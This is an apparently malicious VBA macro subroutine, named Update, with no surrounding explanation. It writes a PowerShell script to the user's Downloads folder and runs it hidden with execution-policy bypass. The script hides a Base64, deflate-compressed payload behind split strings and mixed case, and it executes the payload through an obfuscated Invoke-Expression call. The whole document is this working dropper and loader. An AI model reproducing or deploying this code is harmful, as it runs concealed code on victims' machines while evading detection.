Private Sub Update()

    Dim fSo As Object
    Dim myFile As Object


       Set fSo = CreateObject("Scripting.FileSystemObject")

       Set myFile = fSo.CreateTextFile("C:\Users\user\Downloads\ps.ps1", True)

       myFile.WriteLine "(N`eW-ob`jEct  IO.STREamreAdeR( (n`EW-OBjE`CT IO.cOMPReSSIoN.DeflaTESTrEAm( [Io.MEMorysTreaM][CoNVERT]::froMbaSe64STRIng((('XV'+(('P9T'+'+')+'J'))+'AE'+(('P1'+'X')+'N')+('g3'+'nd'+(('nN'+'0')+'A+'))+('V'+('DT'+'3'))+('Im'+('F'+'Cs'))+('S'+('v'+'Up'))+(('o'+('74'+'M'))+('Yk'+'y')+('1l'+'wW'))+(('o'+'BQ')+'1e'+'Rq')+'/u'+('/3'+'8')+((('w'+'WB')+'e')+'+'+'Hd'+'mm')+('Ye'+('e'+'/t')+'ez')+('M'+('k'+'l4'))+('q'+('Q'+('v'+'8cn4')))+('xk'+('h'+('N'+'iG')+'3a'))+(('jz'+'0')+(('7'+'2y')+'ra')+('Oi'+'ip')+('gt'+'XF'+'3V'))+('t'+('E'+'ee')+(('C'+'0D')+('8'+'Rl')+'7R')+('K'+('B0'+'E')))+('f3'+'st')+('k'+('N'+'YV')+'D+'+(('Z'+'QR')+'wk'+'iH'))+'V'+'I'+((('rk'+'Ov')+'V')+('Fo'+'D')+'T5')+'Tj'+('j0'+'19'+('/7'+('G'+'9g'))+'/I')+('3'+('Q'+'C9')+'YH')+((('cO'+'D')+'dw')+'P'+'s')+'A'+'j'+(('E'+('wX'+'N'))+'U')+('N'+'nU'+('n4'+('q'+'dG'))+('e'+('Xh'+'Kn'))+'m')+(('U'+'Ku')+'d')+(('Rb'+'9')+'iD')+('0g'+'U')+'Pp'+'I'+(('I'+('zS'+'1H')+'B')+(('E'+'n+')+'G')+('21'+('x'+'Jy'))+'mz')+(('o'+'d0')+'2z'+'kQ'+'mt'+'8F'+(('8'+'Dn')+'v'+('o'+'3l')))+'9f'+(('bJ'+'7')+('zV'+'p'))+('q'+('za'+('dJ'+'s'))+('u'+'61'))+(('S'+'KX')+('E'+'Rr'))+(('I'+('bs'+'L'))+'1F'+'gp')+('e'+(('i'+'IT')+'A'))+('x8'+('U8'+'x'))+((('LE'+'i')+'D')+'Ag')+'Cy'+'R'+('Qa'+'x'+(('nD'+'2')+'Q'+'dm'))+(('x'+'gf')+'L')+('l'+('9'+('W'+'jt')+('Fn'+'nd'))+'rJ'+'V8')+((('v'+'bu')+'rl'+'J')+'Mx')+('D'+('aS'+'I'))+'U'+(('L'+('VO'+'G'))+'+3'+('Wo'+'3W'))+('25'+('FN'+'v'))+'1A'+('GK'+(('J3'+'NfZ')+'p')+'J')+('2'+'64')+'Ua'+'c'+('m'+'VR'+(('2IE'+'zD')+('8'+'M1')))+'4'+'da'+('Qk'+'eG'+'Y7')+('pn'+'Q'+('Nx'+'xJ'))+((('AC'+'4')+'S')+'mp'+('V'+('6'+'Jz')))+((('g'+'V6')+'6'+'5d')+'S'+('1F'+'0')+'I8')+('u'+'Lc'+('aI'+'s5'))+(('Sk'+'x')+'g')+(('q4'+'0')+(('VR'+'0V')+'R'+'c')+'p')+'bF'+'5m'+'V'+('t'+(('e'+'lH')+'yX'+'8z')+('e'+('QB'+'b')+('Q'+'azN/')+('ByM'+'A'))+(('H'+'w3')+('Im'+'2'))+(('T'+'zK')+'I')+'F')+('xL'+'d'+(('b+'+'n')+'i'))+(('W'+'GM')+('G'+'jZ'))+('2'+(('N2'+'N')+'8u')+'fQ'+('h'+'7A'))+'0'+('zc'+'X8')+('I'+'bA')+'k'+('8'+(('R6'+'F')+('Xx'+'L')))+(('px'+'R')+'mQ')+'H'+'GM'+'c'+('d'+('Bk'+'A')+'tO'+(('G'+'eP')+('WX'+'E')+('YiB5'+'f'))+('To'+'G/'))+('B'+'ZT')+((('wx'+'F')+'p')+'G'+('f'+'66'))+('q'+(('5S'+'6r')+'L')+'F')+('Pz'+'lu')+('S'+'e6')+('y'+'aM')+(('Rf'+'n')+'To'+(('C'+'DUJ')+('v4'+'L')+'I')+'8'+('m'+'6x')+'Ju'+('7Z'+'U'))+((('Z'+'28f')+'Z')+'o')+'pn'+(('JF'+'n')+'5')+('YR'+'4')+(('M'+('x'+'yn'))+'d')+'Qo'+('i'+('G'+'Cn'))+'B'+('ZX'+('A'+'uv'))+'L'+('h'+('3'+'5e')+('6c'+'l4'))+('Ew'+('b'+('Fe'+'af'))+'C')+('V0'+('GB'+'IK')+'p'+(('7'+'3P')+'Ab'))+'Ce'+(('A'+('G'+'MzN'))+'f'+('qH'+'Q'))+(('H'+'pp')+('Ye'+('UZ'+'oY')))+(('A'+'XA')+'t'+('5'+'U'+('eBC6E'+'Ys'+'r')))+'Mp'+'f'+('K+'+'RW')+'P0'+'t'+(('jL'+('f'+'LM'))+('6'+('2x'+'lxX'))+'uL'+'s')+'p3'+'8'+((('T'+'ZL')+'A')+('N'+'p6'))+'d'+('W'+'HI')+('pk'+('ML'+'DY'))+'h'+('2'+'gL')+('01'+'Ay')+('Lw'+('fK'+'2'))+('x4'+'Gn')+(('sP'+'a')+('A'+'EW')+'cg')+('G'+'R'+('m'+('KKM'+'RD')))+'u'+'m+'+('2W'+(('S'+'Jxvx')+'e')+'p')+'+r'+('/'+'1n')+'M'+(('P'+('LJ'+'b'))+('oM'+'L')+('Qa'+'Z'))+('8f'+(('w'+'Cf')+'P')+'i'+'B3'+'MR'+'3V'+(('u7w'+'R+'+'9')+'T9'))+'9'+('eT'+(('34'+'P')+'k'))+('B'+('f'+'Z8'))+'8F'+'8'+('6w'+(('7u'+'x')+'X'))+'U'+('qd'+'2'+(('ux'+'L0')+'b6'+'Xr'))+(('b'+('KD'+'4'))+('r'+'/A')+('Q='+'=')))) ,[SYsTem.IO.cOMpreSSion.COMPrEssIOnMODe]::dECOMpress)) , [sYsTEm.tEXT.eNCodiNG]::ASCII) ).rEaDTOend( ) | & ( ([strING]$vErBoSEPrEfEReNCe)[1,3]+'X'-join'')"

    myFile.Close
    Set fSo = Nothing


    strCommand = "Powershell -WindowStyle Hidden -ExecutionPolicy Bypass -noexit -File ""C:\Users\user\Downloads\ps.ps1"""
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)

End Sub
